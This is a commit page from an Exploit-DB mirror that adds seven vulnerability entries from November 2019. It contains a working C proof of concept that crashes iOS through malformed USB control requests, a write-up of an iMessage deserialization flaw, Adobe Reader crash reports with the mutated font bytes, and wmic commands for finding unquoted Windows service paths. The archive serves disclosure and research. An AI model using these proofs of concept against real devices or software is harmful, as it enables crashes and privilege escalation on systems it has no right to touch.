bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-11-12

Browse source 
8 changes to exploits/shellcodes

iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)
iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address
Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream
Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)
_GCafé 3.0  - 'gbClienService' Unquoted Service Path
Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path
XML Notepad 2.8.0.4 - XML External Entity Injection
This commit is contained in:
Offensive Security 2019-11-12 05:01:40 +00:00
parent b6ed2c7176
commit 7e9d444235
9 changed files with 623 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

209
exploits/ios/dos/47607.c Normal file
View file

@ -0,0 +1,209 @@
# Exploit Title: iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)
# Date: 2019-10-29
# Exploit Author: Sem Voigtlander, Joshua Hill and Raz Mashat
# Vendor Homepage: https://apple.com/
# Software Link: https://support.apple.com/en-hk/HT210606
# Version: iOS 13
# Tested on: iOS 12.4.1
# CVE : N/A
# A vulnerable implementation of IOInterruptEventSource on a workloop exists in IOUSBDeviceFamily.
# The code can be triggered by a local attacker by sending a malicious USB control request to device.
# It seems the faulting address register is corrupted as result of a heap corruption vulnerability.
# However, on earlier iOS versions (tested on 12.0.1) we were able to trigger a use after free in reserved->statistics relating to the same vulnerable code too.
# This bug was found through statically analyzing xnu from public source and optimized USB fuzzing.
# A proof of concept written in C for macOS is attached, for other platforms python and c code using libusb exists on GitHub (https://github.com/userlandkernel/USBusted)
iousbusted.c
/*
Pure IOKit implementation of CVE-2019-8718
Written by Sem Voigtländer.
Compile: clang iousbusted.c -o iousbusted -framework IOKit -framework CoreFoundation
Tip: You can also use this for projects like checkm8 autopwn etc.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <mach/mach.h>
#include <IOKit/usb/IOUSBLib.h>
#include <IOKit/IOCFPlugIn.h>
#include <CoreFoundation/CoreFoundation.h>
/* Faster comparissions for 64-bit integers than != and == */
#define FCOMP(P1,P2) !(P1 ^ P2)
const char *defaultMsg = "HELLO WORLD";
/* Method for sending an USB control message to a target device */
static int send_usb_msg(IOUSBDeviceInterface** dev, int type, int reqno, int val, int idx, const char *msg)
{
if(!dev){
printf("No device handle given.\n");
return KERN_FAILURE;
}
if(!msg)
msg = defaultMsg;
IOUSBDevRequest req;
req.bmRequestType = type;
req.bRequest = reqno;
req.wValue = val;
req.wIndex = idx;
req.wLength = strlen(msg);
req.pData = msg;
req.wLenDone = 0;
IOReturn rc = KERN_SUCCESS;
rc = (*dev)->DeviceRequest(dev, &req);
if(rc != KERN_SUCCESS)
{
return rc;
}
return KERN_SUCCESS;
}
static int send_usbusted_pwn_msg(IOUSBDeviceInterface** dev, const char *msg)
{
if(!dev){
printf("No device handle given.\n");
return KERN_FAILURE;
}
kern_return_t rc = send_usb_msg(dev, 0|0x80, 0x6, 0x30c, 0x409, msg);
if(rc != kIOReturnSuccess)
{
return rc;
}
return KERN_SUCCESS;
}
/* Print information from an IOKit USB device */
static int print_usb_device(io_service_t device){
kern_return_t err = KERN_SUCCESS;
CFNumberRef vid = 0;
CFNumberRef pid = 0;
CFNumberRef locationID = 0;
CFMutableDictionaryRef p = NULL;
err = IORegistryEntryCreateCFProperties(device, &p, NULL, 0);
if(err != KERN_SUCCESS || !p)
return err;
if(!CFDictionaryGetValueIfPresent(p, CFSTR("idVendor"), &vid))
return KERN_FAILURE;
if(!CFDictionaryGetValueIfPresent(p, CFSTR("idProduct"), &pid))
return KERN_FAILURE;
CFDictionaryGetValueIfPresent(p, CFSTR("locationID"), &locationID);
CFNumberGetValue(vid, kCFNumberSInt32Type, &vid);
CFNumberGetValue(pid, kCFNumberSInt32Type, &pid); // <-- yes I know this is dirty, I was tired.
if(locationID)
CFNumberGetValue(locationID, kCFNumberSInt32Type, &locationID);
printf("Got device %#x @ %#x (%#x:%#x)\n", device, locationID, vid, pid);
return err;
}
/* Get a handle for sending to a device */
static int get_usbdevice_handle(io_service_t device, IOUSBDeviceInterface* dev){
kern_return_t err = KERN_SUCCESS;
SInt32 score;
IOCFPlugInInterface** plugInInterface = NULL;
err = IOCreatePlugInInterfaceForService(device,
kIOUSBDeviceUserClientTypeID,
kIOCFPlugInInterfaceID,
&plugInInterface, &score);
if (err != KERN_SUCCESS || plugInInterface == NULL)
return err;
err = (*plugInInterface)->QueryInterface(plugInInterface, CFUUIDGetUUIDBytes(kIOUSBDeviceInterfaceID), (LPVOID*)dev);
if(err != kIOReturnSuccess)
return err;
// Now done with the plugin interface.
(*plugInInterface)->Release(plugInInterface);
//plugInInterface = NULL;
if(!dev)
return KERN_FAILURE;
return err;
}
/* Iterate over all USB devices */
static int iterate_usb_devices(const char *msg){
CFMutableDictionaryRef matchingDict;
io_iterator_t iter;
kern_return_t kr;
io_service_t device;
/* set up a matching dictionary for the class */
matchingDict = IOServiceMatching(kIOUSBDeviceClassName);
if (matchingDict == NULL)
{
return -1; // fail
}
/* Now we have a dictionary, get an iterator.*/
kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter);
if (kr != KERN_SUCCESS)
{
return -1;
}
/* iterate */
while ((device = IOIteratorNext(iter)))
{
/* do something with device, eg. check properties */
kr = print_usb_device(device);
if(kr != KERN_SUCCESS){
printf("Skipping device as it has no vid / pid.\n");
continue;
}
IOUSBDeviceInterface **dev = 0;
kr = get_usbdevice_handle(device, &dev);
if(kr != KERN_SUCCESS){
printf("Skipping device as no handle for it could be retrieved.\n");
continue;
}
kr = send_usbusted_pwn_msg(dev, msg);
printf("RET: %s\n\n", mach_error_string(kr));
/* And free the reference taken before continuing to the next item */
IOObjectRelease(device);
}
/* Done, release the iterator */
IOObjectRelease(iter);
return 0;
}
int main(int argc, char *argv[]){
char payload[108];
memset(&payload, 'A', 108);
int err = iterate_usb_devices(payload);
return err;
}

94
exploits/multiple/dos/47608.txt Normal file
View file

@ -0,0 +1,94 @@
During processing of incoming iMessages, attacker controlled data is deserialized using the
NSUnarchiver API. One of the classes that is allowed to be decoded from the incoming data is
NSDictionary. However, due to the logic of NSUnarchiver, all subclasses of NSDictionary that also
implement secure coding can then be deserialized as well. NSSharedKeyDictionary is an example of
such a subclass. A NSSharedKeyDictionary is a dictionary for which, for performance reasons, the
keys are predefined using a NSSharedKeySet.
A NSSharedKeyDictionary is essentially a linear array of values and a pointer to its
NSSharedKeySet. An NSSharedKeySet on the other hand looks roughly like this (with some fields
omitted for simplicity and translated to pseudo-C):
struct NSSharedKeySet {
unsigned int _numKeys; // The number of keys in the _keys array
id* _keys; // A pointer to an array containing the key values
unsigned int _rankTable; // A table basically mapping the hashes of
// the keys to an index into _keys
unsigned int _M; // The size of the _rankTable
unsigned int _factor; // Used to compute the index into _rankTable from a hash.
NSSharedKeySet* _subKeySet; // The next KeySet in the chain
};
The value lookup on an NSSharedKeyDictionary then works roughly as follows:
* NSSharedKeyDictionary invokes [NSSharedKeySet indexForKey:] on its associated keySet
* indexForKey: computes the hash of the key, basically computes rti = hash % _factor, bounds-checks
that against _M, and finally uses it to lookup the index in its rankTable: idx = _rankTable[rti]
* It verifies that idx < _numKeys
* It loads _keys[idx] and invokes [key isEqual:candidate] with it as argument
* If the result is true, the index has been found and is returned to the NSSharedKeyDictionary where
it is used to index into its values array
* If not, indexForKey: recursively processes the subKeySet in the same way until it either finds the
key or there is no subKeySet left, in which case it returns -1
The NSArchiver format is powerful enough to allow reference cycles between decoded objects.
This now enables the following attack:
SharedKeyDictionary1 --[ keySet ]-> SharedKeySet1 --[ subKeySet ]-> SharedKeySet2 --+
^ |
| [ subKeySet ]
| |
+-----------------------------------------+
What will happen now is the following:
* The SharedKeyDictionary1 is decoded and its initWithCoder: executed
* [NSSharedKeyDictionary initWithCoder:] decodes its _keySet, which is SharedKeySet1
* The [NSSharedKeySet initWithCoder:] for SharedKeyDictionary1 reads and initializes the following fields:
* _numKeys, which at this point is unchecked and can be any unsigned integer value.
Only later will it be checked to be equal to the number of keys in the _keys array.
* _rankTable, with completely attacker controlled content
* _M, which must be equal to the size of the _rankTable
* _factor, which must be a prime but otherwise can be arbitrarily chosen
At this point, _numKeys = 0xffffffff but _keys is still nullptr (because ObjC objects are
allocated with calloc)
* Next, *before* initializing _keys, it deserializes the _subKeySet, SharedKeySet2
* [NSSharedKeySet initWithCoder:] of SharedKeySet2 finishes, and at the end verifies that
it is a valid SharedKeySet. It does that by checking that all its keys correctly map to an index.
For that it calls [NSSharedKeySet indexForKey:] on itself for every key.
* (At least) one of the keys will, however, not be found on SharedKeySet2. As such,
indexForKey: will proceed to search for the key in its _subKeySet, which is actually SharedKeySet1
* The lookup proceeds and determines that the index should be (in our case) 2189591170, which is
less than SharedKeySet1->numKey (which is still 0xffffffff)
* It then loads SharedKeySet1->keys[2189591170], which, as ->_keys is still nullptr, reads an
objc_object* from 0x414141410 and thus crashes
The attached PoC demonstrates this on the latest macOS 10.14.6
> clang -o tester tester.m -framework Foundation
> ./generator.py
> lldb -- ./tester payload.xml
(lldb) target create "./tester"
Current executable set to './tester' (x86_64).
(lldb) settings set -- target.run-args "payload.xml"
(lldb) r
2019-07-29 15:40:28.989305+0200 tester[71168:496831] Let's go
Process 71168 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x414141410)
frame #0: 0x00007fff3390d3e7 CoreFoundation`-[NSSharedKeySet indexForKey:] + 566
CoreFoundation`-[NSSharedKeySet indexForKey:]:
-> 0x7fff3390d3e7 <+566>: mov rdx, qword ptr [rax + 8*r13]
Combined with a heap spray, this bug could likely be remotely exploitable.
Ideally, this issue and similar ones can be prevented by removing the NSSharedKeyDictionary attack
surface completely, as originally suggested by Natalie. Alternatively, I think another solution
might be to stop encoding all the internal fields of the NSSharedKeyDictionary/NSSharedKeySet
(rankTable, numKeys, especially the subKeySet, ...) and only encode the keys and values. The new
[initWithCoder:] implementations could then just call +[NSSharedKeySet keySetWithKeys:] and
+[NSSharedKeyDictionary sharedKeyDictionaryWithKeySet:] to construct new instances with the decoded
keys and values. This should be fine as all the other fields are implementation details anyway.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47608.zip

81
exploits/windows/dos/47609.txt Normal file
View file

@ -0,0 +1,81 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(88e4.30f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0478be34 ecx=00000000 edx=c0c0c0c0 esi=00000000 edi=00000000
eip=5fdc2341 esp=0478bd24 ebp=0478bd54 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1:
5fdc2341 8a4a04 mov cl,byte ptr [edx+4] ds:002b:c0c0c0c4=??
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0478bd54 5fdb1157 0478be48 ceb1c57a 68754f88 AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1
01 0478bea0 5fdafd04 68754f88 00000002 687fefe8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x35f7
02 0478bed8 5fda234f 5f198f54 5f198f54 68504fb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21a4
03 0478beec 5fd95227 68504fb8 00000044 684fcf40 AcroRd32!AX_PDXlateToHostEx+0x34468f
04 0478bfa0 5f795889 5f198f54 590b4fb0 5f7957f0 AcroRd32!AX_PDXlateToHostEx+0x337567
05 0478bfc4 5f795783 4d346ff8 00000001 00000001 AcroRd32!DllCanUnloadNow+0x4c929
06 0478bfe4 5fbe1d7a 0478c008 4d346ff8 00000001 AcroRd32!DllCanUnloadNow+0x4c823
07 0478c028 5f8cafc8 c0020000 00000001 4d346ff8 AcroRd32!AX_PDXlateToHostEx+0x1840ba
08 0478c37c 5f8ca506 0478c3d8 7492ea98 ceb1b86e AcroRd32!DllCanUnloadNow+0x182068
09 0478c3b4 5f8ca3e1 0478c3d8 7492ea98 0478c444 AcroRd32!DllCanUnloadNow+0x1815a6
0a 0478c420 5f8c93a8 c0020000 00000001 7492ea98 AcroRd32!DllCanUnloadNow+0x181481
0b 0478c880 5f8c68f7 0478cb84 6856c5ac c0020000 AcroRd32!DllCanUnloadNow+0x180448
0c 0478e060 5f8c6575 6856c5ac c0020000 00000001 AcroRd32!DllCanUnloadNow+0x17d997
0d 0478e130 5f8aa25c ceb199ca 45e6ef78 00000000 AcroRd32!DllCanUnloadNow+0x17d615
0e 0478e210 5f8a9057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc
0f 0478e25c 5f89c183 45e6ef78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7
10 0478e3d0 5f89ba97 67fccdbc 00000001 5ef9cef8 AcroRd32!DllCanUnloadNow+0x153223
11 0478e438 5f899281 ceb19f62 6fca6fc8 823c2ea8 AcroRd32!DllCanUnloadNow+0x152b37
12 0478e4b8 5f898dae 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x150321
13 0478e4f4 5f898d07 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x14fe4e
14 0478e57c 5f8982ee 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14fda7
15 0478e5b8 5f896f02 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14f38e
16 0478e87c 5f895d98 5ef9cef8 0478e910 0478e960 AcroRd32!DllCanUnloadNow+0x14dfa2
17 0478e980 5f895175 5ef9cef8 0478eab0 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
18 0478ead4 5f8942ba 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14c215
19 0478eb34 5f89414d 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b35a
1a 0478eb54 5f892d3c 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
1b 0478ec0c 5f892762 00000001 00000000 ceb197be AcroRd32!DllCanUnloadNow+0x149ddc
1c 0478ec64 5f89257a 3f3fcef0 00000001 ceb19712 AcroRd32!DllCanUnloadNow+0x149802
1d 0478ecc8 5f8922ff 0478edbc ceb19606 8355afa0 AcroRd32!DllCanUnloadNow+0x14961a
1e 0478eddc 5f75687c 8355afa0 5f7567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
1f 0478edf4 5f75678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
20 0478ee10 745de0bb 02a20faa 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
21 0478ee3c 745e8849 5f7566d0 02a20faa 0000000f USER32!_InternalCallWinProc+0x2b
22 0478ee60 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
23 0478ef30 745d8503 5f7566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
24 0478ef98 745d8aa0 13f2abb0 00000000 0000000f USER32!DispatchClientMessage+0x1b3
25 0478efe0 77371a6d 0478effc 00000020 0478f05c USER32!__fnDWORD+0x50
26 0478f018 745d91ee 0478f0ac ce1677b9 18068dd8 ntdll!KiUserCallbackDispatcher+0x4d
27 0478f06c 745d8c20 ca6e87d5 0478f090 5f76da6d USER32!DispatchMessageWorker+0x5be
28 0478f078 5f76da6d 0478f0ac 18068dd8 18068dd8 USER32!DispatchMessageW+0x10
29 0478f090 5f76d89e 0478f0ac ceb18ade 18068dd8 AcroRd32!DllCanUnloadNow+0x24b0d
2a 0478f104 5f76d744 ceb18ae6 18068dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
2b 0478f13c 5f6fc575 ceb18a76 16cb6ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
2c 0478f1ac 5f6fbf81 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x775
2d 0478f5cc 0011783d 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x181
2e 0478f998 002201aa 00110000 00000000 0b48b3f2 AcroRd32_exe+0x783d
2f 0478f9e4 76698674 04504000 76698650 1f7eb52b AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
30 0478f9f8 77365e17 04504000 fdd62153 00000000 KERNEL32!BaseThreadInitThunk+0x24
31 0478fa40 77365de7 ffffffff 7738adab 00000000 ntdll!__RtlUserThreadStart+0x2f
32 0478fa50 00000000 00111390 04504000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
- The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to a single byte at offset 0x2f5, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0x35.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47609.zip

142
exploits/windows/dos/47610.txt Normal file
View file

@ -0,0 +1,142 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(5708.4564): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c0c0c0c0 ebx=00000000 ecx=6826e380 edx=00000000 esi=00000002 edi=00000006
eip=15e440e8 esp=047fc158 ebp=047fc1b8 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210293
CoolType!CTCleanup+0x25be8:
15e440e8 f6403860 test byte ptr [eax+38h],60h ds:002b:c0c0c0f8=??
0:000> u @$scopeip-9
CoolType!CTCleanup+0x25bdf:
15e440df 8b4d08 mov ecx,dword ptr [ebp+8]
15e440e2 8b7dc4 mov edi,dword ptr [ebp-3Ch]
15e440e5 8b0481 mov eax,dword ptr [ecx+eax*4]
15e440e8 f6403860 test byte ptr [eax+38h],60h
15e440ec 0f851f010000 jne CoolType!CTCleanup+0x25d11 (15e44211)
15e440f2 0fb7781a movzx edi,word ptr [eax+1Ah]
15e440f6 0fb7401e movzx eax,word ptr [eax+1Eh]
15e440fa 8bc8 mov ecx,eax
0:000> dd ecx
6826e380 16063e80 16063e40 1605fd00 c0c0c0c0
6826e390 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3a0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3b0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3d0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3e0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
6826e3f0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 047fc1b8 15e434ea 6826e380 1605fce0 6826e388 CoolType!CTCleanup+0x25be8
01 047fc1d4 15e43f02 6826e380 1605fd00 6826e388 CoolType!CTCleanup+0x24fea
02 047fc1fc 15e4edc1 6936cff0 16063e40 1605fd00 CoolType!CTCleanup+0x25a02
03 047fc230 15deb53d 6936cbf0 047fcca4 00000f5c CoolType!CTCleanup+0x308c1
04 047fc94c 15de6251 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x483dd
05 047fca30 15e223fa 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x430f1
06 047fcb88 15e220be 6936cbf0 047fcd5c 047fcd2c CoolType!CTCleanup+0x3efa
07 047fcc04 15df972d 6936cbf0 16067080 047fcd5c CoolType!CTCleanup+0x3bbe
08 047fcdcc 15df8f00 047fcfc0 00000000 16067330 CoolType!CTInit+0x565cd
09 047fce9c 15df7d87 0b601000 00000001 00000001 CoolType!CTInit+0x55da0
0a 047fd268 15df7414 0000012c 86c0e9cc 00001aba CoolType!CTInit+0x54c27
0b 047fd2ac 15df63de 86c0e9c0 00000064 047fd344 CoolType!CTInit+0x542b4
0c 047fd41c 15df5eb9 047fd834 047fdbb0 0000044a CoolType!CTInit+0x5327e
0d 047fd470 16112a42 3ede4e60 047fd834 047fdbb0 CoolType!CTInit+0x52d59
0e 047fd7b8 16111888 8ec19b64 047fd834 047fdbb0 AGM!AGMInitialize+0x69bd2
0f 047fd918 160dc460 047fd980 8ec19b00 047fdc48 AGM!AGMInitialize+0x68a18
10 047fd9b4 160e469a 047fdb98 8ec19b00 047fdc48 AGM!AGMInitialize+0x335f0
11 047fdbe0 160e2ae0 3eb84ba0 67b69f70 8ec19b00 AGM!AGMInitialize+0x3b82a
12 047fddbc 160e186c 3eb84ba0 67b69f70 56375db9 AGM!AGMInitialize+0x39c70
13 047fde08 161107ff 3eb84ba0 67b69f70 68a8ad50 AGM!AGMInitialize+0x389fc
14 047fde2c 1611030e 00000301 1611044f 67b69f70 AGM!AGMInitialize+0x6798f
15 047fde34 1611044f 67b69f70 56375d11 68a8ad50 AGM!AGMInitialize+0x6749e
16 047fde6c 160b945b 047fdf40 1610f910 00000000 AGM!AGMInitialize+0x675df
17 047fdec0 5fdcd4ad 047fde00 5fdcd4b4 dd9e27c4 AGM!AGMInitialize+0x105eb
18 047fdec8 5fdcd4b4 dd9e27c4 68a8ad50 047fdeac AcroRd32!DllCanUnloadNow+0x18454d
19 047fdee8 5fddb77d 3ede4f64 7cb8ed90 047fdf00 AcroRd32!DllCanUnloadNow+0x184554
1a 047fdf04 5fddb274 553c0f84 dd9e2644 553c0f58 AcroRd32!DllCanUnloadNow+0x19281d
1b 047fdf6c 5fdeef36 dd9e2698 00000000 553c0f58 AcroRd32!DllCanUnloadNow+0x192314
1c 047fdfb0 5fddaa40 dd9e26d4 5e4a0f78 553c0f58 AcroRd32!CTJPEGDecoderRelease+0x3426
1d 047fdffc 5fdda902 dd9e196c 5e4a0f78 047fe0ec AcroRd32!DllCanUnloadNow+0x191ae0
1e 047fe044 5fdda7e3 047fe060 dd9e1998 047fe41c AcroRd32!DllCanUnloadNow+0x1919a2
1f 047fe0b0 5fdda677 047fe0ec 8ef46ff0 3fe7bc80 AcroRd32!DllCanUnloadNow+0x191883
20 047fe110 5fdd8aed 8ef46ff0 5fddbc70 047fe41c AcroRd32!DllCanUnloadNow+0x191717
21 047fe210 5fdd8542 047fe41c dd9e1b74 1a74ed88 AcroRd32!DllCanUnloadNow+0x18fb8d
22 047fe25c 5fdd79dd 047fe41c 047fe424 dd9e1df0 AcroRd32!DllCanUnloadNow+0x18f5e2
23 047fe4d8 5fdd77ee 00000002 81ffa4e2 dd9e1c1c AcroRd32!DllCanUnloadNow+0x18ea7d
24 047fe534 5fd9706a 00000002 81ffa4e2 dd9e1ec4 AcroRd32!DllCanUnloadNow+0x18e88e
25 047fe7ec 5fd95d98 5ee78ef8 047fe880 047fe8d0 AcroRd32!DllCanUnloadNow+0x14e10a
26 047fe8f0 5fd95175 5ee78ef8 047fea20 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
27 047fea44 5fd942ba 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14c215
28 047feaa4 5fd9414d 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b35a
29 047feac4 5fd92d3c 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
2a 047feb7c 5fd92762 00000001 00000000 dd9e12fc AcroRd32!DllCanUnloadNow+0x149ddc
2b 047febd4 5fd9257a 7313eef0 00000001 dd9e1510 AcroRd32!DllCanUnloadNow+0x149802
2c 047fec38 5fd922ff 047fed2c dd9e1464 81ff8fa0 AcroRd32!DllCanUnloadNow+0x14961a
2d 047fed4c 5fc5687c 81ff8fa0 5fc567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
2e 047fed64 5fc5678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
2f 047fed80 745de0bb 03870c42 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
30 047fedac 745e8849 5fc566d0 03870c42 0000000f USER32!_InternalCallWinProc+0x2b
31 047fedd0 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
32 047feea0 745d8503 5fc566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
33 047fef08 745d8aa0 13ff4e80 00000000 0000000f USER32!DispatchClientMessage+0x1b3
34 047fef50 77371a6d 047fef6c 00000020 047fefcc USER32!__fnDWORD+0x50
35 047fef88 745d91ee 047ff01c e165025c 18170dd8 ntdll!KiUserCallbackDispatcher+0x4d
36 047fefdc 745d8c20 e51aed80 047ff000 5fc6da6d USER32!DispatchMessageWorker+0x5be
37 047fefe8 5fc6da6d 047ff01c 18170dd8 18170dd8 USER32!DispatchMessageW+0x10
38 047ff000 5fc6d89e 047ff01c dd9e095c 18170dd8 AcroRd32!DllCanUnloadNow+0x24b0d
39 047ff074 5fc6d744 dd9e0984 18170dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
3a 047ff0ac 5fbfc575 dd9e0834 16d7eff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
3b 047ff11c 5fbfbf81 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x775
3c 047ff53c 0011783d 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x181
3d 047ff908 002201aa 00110000 00000000 0b61b3f2 AcroRd32_exe+0x783d
3e 047ff954 76698674 0480b000 76698650 5ab919ba AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
3f 047ff968 77365e17 0480b000 666934db 00000000 KERNEL32!BaseThreadInitThunk+0x24
40 047ff9b0 77365de7 ffffffff 7738ad9b 00000000 ntdll!__RtlUserThreadStart+0x2f
41 047ff9c0 00000000 00111390 0480b000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
- The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to three bytes at offsets 0x71a4, 0x71a5 and 0x71ba. They were changed from 0x1C, 0x14, 0x89 to 0xFF, 0xFF, 0x0E. When we analyzed it further, we determined that these bytes reside inside the "CFF " table of the embedded OpenType font. After extracting the font and decompiling it with the ttx tool from FontTools, we found that the difference is in the CharString of the "afii10091" glyph.
Original code:
--- cut ---
[...]
cntrmask 00011100
cntrmask 00000110
32 hmoveto
660 hlineto
120 0 32 -22 15 -146 rrcurveto
28 0 -13 203 -2 0 rlineto
[...]
--- cut ---
Mutated code:
--- cut ---
[...]
cntrmask 11111111
1707.08974 -99 hlineto
120 0 32 -22 15 -146 rrcurveto
28 0 -13 203 endchar
0 rlineto
[...]
--- cut ---
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47610.zip

31
exploits/windows/local/47604.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: _GCafé 3.0 - 'gbClienService' Unquoted Service Path
# Google Dork: N/A
# Date: 2019-11-09
# Exploit Author: Doan Nguyen (4ll4u)
# Vendor Homepage: https://gcafe.vn/
# Software Link: https://gcafe.vn/post/view?slug=gcafe-3.0
# Version: v3.0
# Tested on: Windows 7, Win 10, WinXP
# CVE : N/A
# Description:
# GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points
# PoC:
# wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
gbClientService gbClientService C:\Program Files\GBillingClient\gbClientService.exe Auto
#C:\>sc qc gbClientService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: gbClientService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\GBillingClient\gbClientService.exe
LOAD_ORDER_GROUP : GarenaGroup
TAG : 0
DISPLAY_NAME : gbClientService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>

29
exploits/windows/local/47605.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path
# Date: 2019-11-07
# Exploit Author: Héctor Gabriel Chimecatl Hernández
# Vendor Homepage: https://www.alps.com/e/
# Software Link: https://www.alps.com/e/
# Version: 8.1.0.10
# Tested on: Windows 10 Home Single Language x64 Esp
# Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
# Service info:
